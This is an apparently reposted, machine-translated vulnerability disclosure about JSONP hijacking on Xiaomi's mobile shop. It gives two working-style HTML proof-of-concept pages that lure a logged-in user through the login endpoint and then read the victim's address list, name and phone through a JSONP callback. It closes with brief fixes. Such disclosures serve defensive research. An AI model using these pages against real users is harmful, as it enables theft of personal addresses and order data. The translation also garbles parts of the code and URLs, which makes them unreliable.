Xiaomi js hijacking can obtain user addresses and order information (mobile phone communication API mining skills)

Source: Internet
Author: User

The method for obtaining data in an application is jsonp, and callback can be obtained naturally.

The mobile phone client of Xiaomi mall is actually a built-in browser loaded m.xiaomi.com, and the user's address, order and other data exist in app.shopapi.xiaomi.com. It is estimated that the jsonp method is used for cross-origin, as a result, JavaScript hijacking can be used to obtain user data.

Test process:

1. Enable Burp and proxy

2. Set up an Internet proxy on the mobile phone, view the http request, and then see a series of callback requests.

3. in step 2, only m.xiaomi.com can be hijacked by js. What can I do with www.xiaomi.com and other domain names?

4. Was m.xiaomi.com found that the login interface used is https://account.xiaomi.com/pass/serviceLogin? Callback =... & sid = eshopmobile, the focus is eshopmobile (eshopmobile will log on to app.shopapi.xiaomi.com synchronously), while eshop

5. Through 4 analysis, in the case of user login to lure the user to access a https://account.xiaomi.com/pass/serviceLogin? Callback =... & sid = eshopmobile. The main domain name and other domain names can also be hijacked by js.

6. script for hijacking the user address list:

Xiaomi.html


<Iframe src = "https://account.xiaomi.com/pass/serviceLogin? Signature % 2523ac % 253 Daccount % 2526op % 253 Dindex % 26 sign % signature % 2C % 2C & sid = esw.mobile "> </iframe> <! -- The sign in it is used for verification. Each login is different and does not affect hijacking. -->
<Script>
SetTimeout (function () {location.href='xiaomi2.html ';}, 3000 );
</Script>

Xiaomi2.html


<Script>
Function getall (o ){
Var data = o. data;
Alert (data [0]. consignee + ''+ data [0]. tel );
}
</Script>
<Script src = "http://app.shopapi.xiaomi.com/v1/address/list? Callback = getall & client_id = 180100031013 & _ = 1367750497612 "> </script>
 




 


Solution:

1. It can be returned in pure json. The p3p method in the header of the header is cross-origin.

2. If jsonp is required, Judge Referer + UserAgent ~

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.